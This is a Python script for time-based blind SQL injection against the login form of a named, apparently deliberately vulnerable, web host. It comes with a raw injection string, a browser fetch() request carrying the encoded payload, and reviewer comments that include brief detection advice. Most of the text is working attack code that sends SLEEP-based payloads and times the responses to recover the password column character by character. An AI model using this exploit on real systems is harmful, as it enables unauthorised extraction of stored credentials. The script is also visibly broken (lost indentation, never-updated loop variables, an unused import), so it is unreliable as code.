- # test' OR IF(substring(password,1,1)='a' SLEEP(10), null)' --
- # fetch("http://reign-vuln-1.azurewebsites.net/check_login.php", {"credentials":"include","headers":{"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3","accept-language":"en-US,en;q=0.9","cache-control":"max-age=0","content-type":"application/x-www-form-urlencoded","upgrade-insecure-requests":"1"},"referrer":"http://reign-vuln-1.azurewebsites.net/","referrerPolicy":"no-referrer-when-downgrade","body":"myusername=admin&mypassword=test%27+OR++IF%28substring%28password%2C1%2C1%29%3D%27c%27+SLEEP%2810%29%2C+null%29%27+--&submit_button=Submit","method":"POST","mode":"cors"});
- from stringprep import c22_specials
- import requests
- from rich import print
- # NOTE(review): indentation was lost when this paste was rendered, so which
- # statements sit inside the for-loop and the with-block cannot be read off
- # the text. The comments below describe each statement on its own.
- #
- # Endpoint that receives the form POST (presumably the login handler, going
- # by its name and the myusername/mypassword fields). The scheme is plain
- # http, so the form fields travel unencrypted.
- url = "http://reign-vuln-1.azurewebsites.net/check_login.php"
- # Candidate characters: lowercase ASCII letters and digits only.
- CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"
- # Receives the key_guesses dict via the append on the last line.
- l_guess = []
- # Length argument given to substring(); no visible line changes it from 1.
- i = 1
- # Largest response time seen so far and the character that produced it.
- highest_time = 0
- highest_char = "a"
- # key collects highest_char; password is the prefix placed in front of each
- # candidate and is never reassigned in the visible lines, so it stays empty.
- key = ""
- password=""
- for c in CHARSET:
- # Maps a candidate character to its measured response time in seconds.
- key_guesses = {}
- test_password = password + c
- #Construct the SQL timing exploit
- # The string closes a quote, then adds an OR condition that calls SLEEP(3)
- # only when substring(password,1,i) equals the candidate. It can only have
- # an effect if the server builds its SQL text by concatenating the
- # mypassword field -- presumably the case here; a parameterized query
- # (bound value) would treat the whole string as data.
- # NOTE(review): the comparison reads the password column directly; storing
- # only a salted, slow hash limits what a leak of this column exposes.
- exploit = "{}' OR IF(substring(password,1,{}) = '{}', SLEEP(3), null) --'".format(password, str(i), test_password)
- #Construct the input payload, where the username is admin
- #and the password is the exploit
- payload = {
- "myusername": "admin",
- "mypassword": exploit,
- "submit_button": "Submit"
- }
- #Visit the website url using the requests library
- # Defender view: each probe is an ordinary form POST whose mypassword field
- # carries SQL keywords (IF, substring, SLEEP), and a matching probe answers
- # about 3 s later than the others. Request-body inspection, database
- # slow-query logs and per-account login rate limiting are where this
- # pattern becomes visible.
- with requests.Session() as s:
- p = s.post(url, data=payload)
- # elapsed is requests' own measurement, taken from sending the request until
- # the response headers have been parsed.
- ti = p.elapsed.total_seconds()
- # Keep the slowest response; no fixed threshold is applied, only a running
- # maximum.
- if ti > highest_time:
- highest_char = c
- highest_time = ti
- key_guesses[c] = ti
- # print is rich's print, imported at the top of the file.
- print (f"{highest_char} : {highest_time}")
- key += highest_char
- l_guess.append(key_guesses)